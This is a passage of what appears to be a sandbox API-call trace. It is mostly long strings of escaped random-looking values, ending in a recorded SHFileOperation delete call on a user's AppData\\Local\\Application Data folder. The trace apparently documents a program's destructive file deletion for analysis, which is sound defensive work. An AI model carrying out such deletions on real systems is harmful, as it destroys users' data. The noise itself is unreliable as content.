46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\